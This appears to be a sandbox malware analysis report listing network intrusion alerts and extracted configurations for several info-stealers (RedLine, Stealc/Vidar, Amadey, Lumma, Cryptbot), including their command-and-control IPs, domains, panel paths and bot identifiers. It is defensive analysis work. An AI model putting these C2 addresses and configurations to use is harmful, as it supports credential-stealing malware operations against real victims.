SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.8 - Destination IP: 185.215.113.17

Timestamp:	2024-09-03T17:13:17.551303+0200
SID:	2044243
Severity:	1
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:16.827619+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:18.227936+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:06.674759+0200
SID:	2055489
Severity:	1
Source Port:	49801
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:20.678238+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.16

Timestamp:	2024-09-03T17:13:31.305637+0200
SID:	2044696
Severity:	1
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.8 - Destination IP: 91.202.233.158

Timestamp:	2024-09-03T17:13:48.819631+0200
SID:	2803304
Severity:	3
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.19

Timestamp:	2024-09-03T17:14:02.850813+0200
SID:	2044597
Severity:	1
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (millyscroqwp .shop) - Source IP: 192.168.2.8 - Destination IP: 188.114.97.3

Timestamp:	2024-09-03T17:14:15.496847+0200
SID:	2055490
Severity:	1
Source Port:	49822
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity M2 - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:23.226498+0200
SID:	2049812
Severity:	1
Source Port:	49841
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:23.226498+0200
SID:	2054653
Severity:	1
Source Port:	49841
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) - Source IP: 192.168.2.8 - Destination IP: 1.1.1.1

Timestamp:	2024-09-03T17:14:03.631383+0200
SID:	2055479
Severity:	1
Source Port:	63692
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 - Source IP: 192.168.2.8 - Destination IP: 195.133.48.136

Timestamp:	2024-09-03T17:14:06.031862+0200
SID:	2054350
Severity:	1
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.16

Timestamp:	2024-09-03T17:13:25.855534+0200
SID:	2044696
Severity:	1
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:14:20.756352+0200
SID:	2043231
Severity:	1
Source Port:	49816
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.17

Timestamp:	2024-09-03T17:13:18.083792+0200
SID:	2044246
Severity:	1
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:13.643431+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.8 - Destination IP: 188.114.97.3

Timestamp:	2024-09-03T17:14:16.600141+0200
SID:	2049836
Severity:	1
Source Port:	49822
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.8 - Destination IP: 188.114.97.3

Timestamp:	2024-09-03T17:14:16.600141+0200
SID:	2054653
Severity:	1
Source Port:	49822
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.8 - Destination IP: 52.212.52.84

Timestamp:	2024-09-03T17:13:32.005801+0200
SID:	2803305
Severity:	3
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.8 - Destination IP: 185.215.113.16

Timestamp:	2024-09-03T17:13:41.065171+0200
SID:	2803305
Severity:	3
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:24.847143+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.8 - Destination IP: 91.202.233.158

Timestamp:	2024-09-03T17:13:46.361477+0200
SID:	2803304
Severity:	3
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:18.638414+0200
SID:	2049836
Severity:	1
Source Port:	49830
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:18.638414+0200
SID:	2054653
Severity:	1
Source Port:	49830
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.8 - Destination IP: 91.202.233.158

Timestamp:	2024-09-03T17:13:46.945155+0200
SID:	2803304
Severity:	3
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:15.957021+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:12.932757+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:12.932757+0200
SID:	2046045
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.19

Timestamp:	2024-09-03T17:14:21.830251+0200
SID:	2044597
Severity:	1
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity M2 - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:07.157467+0200
SID:	2049812
Severity:	1
Source Port:	49801
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:07.157467+0200
SID:	2054653
Severity:	1
Source Port:	49801
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.19

Timestamp:	2024-09-03T17:14:05.191700+0200
SID:	2044597
Severity:	1
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.8 - Destination IP: 91.202.233.158

Timestamp:	2024-09-03T17:13:40.273848+0200
SID:	2803304
Severity:	3
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.16

Timestamp:	2024-09-03T17:13:40.810187+0200
SID:	2044696
Severity:	1
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 - Source IP: 192.168.2.8 - Destination IP: 195.133.13.230

Timestamp:	2024-09-03T17:14:24.070396+0200
SID:	2054350
Severity:	1
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.16

Timestamp:	2024-09-03T17:13:10.974130+0200
SID:	2044696
Severity:	1
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.8 - Destination IP: 185.215.113.17

Timestamp:	2024-09-03T17:13:30.485032+0200
SID:	2803304
Severity:	3
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.8 - Destination IP: 91.202.233.158

Timestamp:	2024-09-03T17:13:37.900967+0200
SID:	2044244
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 65.21.18.51 - Destination IP: 192.168.2.8

Timestamp:	2024-09-03T17:14:20.761258+0200
SID:	2046056
Severity:	1
Source Port:	45580
Destination Port:	49816
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:37.105307+0200
SID:	2049836
Severity:	1
Source Port:	49852
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:37.105307+0200
SID:	2054653
Severity:	1
Source Port:	49852
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.8 - Destination IP: 91.202.233.158

Timestamp:	2024-09-03T17:13:49.351159+0200
SID:	2803304
Severity:	3
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:19.746971+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:18.682070+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:17.976312+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 65.21.18.51 - Destination IP: 192.168.2.8

Timestamp:	2024-09-03T17:13:18.461081+0200
SID:	2046056
Severity:	1
Source Port:	45580
Destination Port:	49722
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.16

Timestamp:	2024-09-03T17:13:07.196167+0200
SID:	2044696
Severity:	1
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 185.215.113.17 - Destination IP: 192.168.2.8

Timestamp:	2024-09-03T17:13:18.227640+0200
SID:	2044247
Severity:	1
Source Port:	80
Destination Port:	49726
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 - Source IP: 192.168.2.8 - Destination IP: 195.133.48.136

Timestamp:	2024-09-03T17:13:49.849507+0200
SID:	2054350
Severity:	1
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:14:24.140143+0200
SID:	2043231
Severity:	1
Source Port:	49816
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.8 - Destination IP: 185.215.113.17

Timestamp:	2024-09-03T17:13:27.054219+0200
SID:	2803304
Severity:	3
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.17

Timestamp:	2024-09-03T17:13:17.819174+0200
SID:	2044244
Severity:	1
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer Related Activity M2 - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:43.510485+0200
SID:	2049812
Severity:	1
Source Port:	49854
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:43.510485+0200
SID:	2054653
Severity:	1
Source Port:	49854
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.8 - Destination IP: 91.202.233.158

Timestamp:	2024-09-03T17:13:44.498009+0200
SID:	2803304
Severity:	3
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.8 - Destination IP: 185.215.113.16

Timestamp:	2024-09-03T17:13:07.835580+0200
SID:	2803305
Severity:	3
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc Submitting Screenshot to C2 - Source IP: 192.168.2.8 - Destination IP: 91.202.233.158

Timestamp:	2024-09-03T17:13:51.866231+0200
SID:	2044249
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.19

Timestamp:	2024-09-03T17:14:00.124906+0200
SID:	2044597
Severity:	1
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.19

Timestamp:	2024-09-03T17:14:10.338401+0200
SID:	2044597
Severity:	1
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.19

Timestamp:	2024-09-03T17:14:19.964197+0200
SID:	2044597
Severity:	1
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:14:23.608845+0200
SID:	2043231
Severity:	1
Source Port:	49816
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.19

Timestamp:	2024-09-03T17:14:08.741901+0200
SID:	2044696
Severity:	1
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.8 - Destination IP: 52.212.52.84

Timestamp:	2024-09-03T17:13:17.757166+0200
SID:	2803305
Severity:	3
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.16

Timestamp:	2024-09-03T17:13:03.889350+0200
SID:	2856147
Severity:	1
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Submitting System Information to C2 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.17

Timestamp:	2024-09-03T17:13:18.900848+0200
SID:	2044248
Severity:	1
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.8 - Destination IP: 91.202.233.158

Timestamp:	2024-09-03T17:13:37.621860+0200
SID:	2044243
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:18.092838+0200
SID:	2055489
Severity:	1
Source Port:	49830
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:23.316775+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.8 - Destination IP: 91.202.233.158

Timestamp:	2024-09-03T17:13:45.654603+0200
SID:	2803304
Severity:	3
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:18.798510+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:14:23.181535+0200
SID:	2043231
Severity:	1
Source Port:	49816
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:23.809313+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (millyscroqwp .shop) - Source IP: 192.168.2.8 - Destination IP: 188.114.97.3

Timestamp:	2024-09-03T17:14:01.488768+0200
SID:	2055490
Severity:	1
Source Port:	49788
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.8 - Destination IP: 185.215.113.17

Timestamp:	2024-09-03T17:13:28.555786+0200
SID:	2803304
Severity:	3
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:19.514753+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.19

Timestamp:	2024-09-03T17:13:54.708553+0200
SID:	2044597
Severity:	1
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:14:22.153084+0200
SID:	2043231
Severity:	1
Source Port:	49816
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:22.226994+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 - Source IP: 192.168.2.8 - Destination IP: 195.133.13.230

Timestamp:	2024-09-03T17:14:16.981849+0200
SID:	2054350
Severity:	1
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:13:21.551182+0200
SID:	2043231
Severity:	1
Source Port:	49722
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Submitting System Information to C2 - Source IP: 192.168.2.8 - Destination IP: 91.202.233.158

Timestamp:	2024-09-03T17:13:39.040064+0200
SID:	2044248
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:42.957980+0200
SID:	2055489
Severity:	1
Source Port:	49854
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:19.555556+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.8 - Destination IP: 185.215.113.26

Timestamp:	2024-09-03T17:13:11.902992+0200
SID:	2803305
Severity:	3
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:15.376718+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:18.505662+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 95.179.250.45 - Destination IP: 192.168.2.8

Timestamp:	2024-09-03T17:13:08.594358+0200
SID:	2043234
Severity:	1
Source Port:	26212
Destination Port:	49714
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Response M1 - Source IP: 185.215.113.19 - Destination IP: 192.168.2.8

Timestamp:	2024-09-03T17:13:56.603377+0200
SID:	2856122
Severity:	1
Source Port:	80
Destination Port:	49774
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 65.21.18.51

Timestamp:	2024-09-03T17:14:23.890881+0200
SID:	2043231
Severity:	1
Source Port:	49816
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 65.21.18.51 - Destination IP: 192.168.2.8

Timestamp:	2024-09-03T17:13:13.411386+0200
SID:	2043234
Severity:	1
Source Port:	45580
Destination Port:	49722
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.8 - Destination IP: 95.179.250.45

Timestamp:	2024-09-03T17:13:15.763012+0200
SID:	2043231
Severity:	1
Source Port:	49714
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.8 - Destination IP: 188.114.97.3

Timestamp:	2024-09-03T17:14:36.198012+0200
SID:	2049836
Severity:	1
Source Port:	49851
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.8 - Destination IP: 188.114.97.3

Timestamp:	2024-09-03T17:14:36.198012+0200
SID:	2054653
Severity:	1
Source Port:	49851
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) - Source IP: 192.168.2.8 - Destination IP: 188.114.96.3

Timestamp:	2024-09-03T17:14:04.407913+0200
SID:	2055489
Severity:	1
Source Port:	49794
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.8 - Destination IP: 185.215.113.16

Timestamp:	2024-09-03T17:13:14.463443+0200
SID:	2044696
Severity:	1
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: locatedblsoqp.shop	URL Reputation: Label: phishing
Source: millyscroqwp.shop	URL Reputation: Label: malware

Found malware configuration

Source: 00000009.00000002.1959861483.0000000003F75000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "95.179.250.45:26212", "Bot Id": "LiveTraffic", "Message": "Error! Disable antivirus and try again!", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}
Source: 00000019.00000002.2456504727.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php"}
Source: 20.2.Hkbsse.exe.620000.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.26/Dem7kTu/index.php", "Version": "4.41", "Install Folder": "054fdc5f70", "Install File": "Hkbsse.exe"}
Source: 37.2.BitLockerToGo.exe.550000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["millyscroqwp.shop", "stagedchheiqwo.shop", "evoliutwoqm.shop", "locatedblsoqp.shop", "stamppreewntnq.shop", "traineiwnqo.shop", "condedqpwqm.shop", "caffegclasiqwp.shop"], "Build id": "y1TO5A--QX1"}
Source: 22.2.stealc_default2.exe.9e0000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default2"}
Source: channel3.exe.5192.39.memstrmin	Malware Configuration Extractor: Cryptbot {"C2 list": ["thirtv13vt.top", "analforeverlovyu.top"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\1000238002\Amadeus.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\Setup[1].exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Amadeus[1].exe	ReversingLabs: Detection: 36%
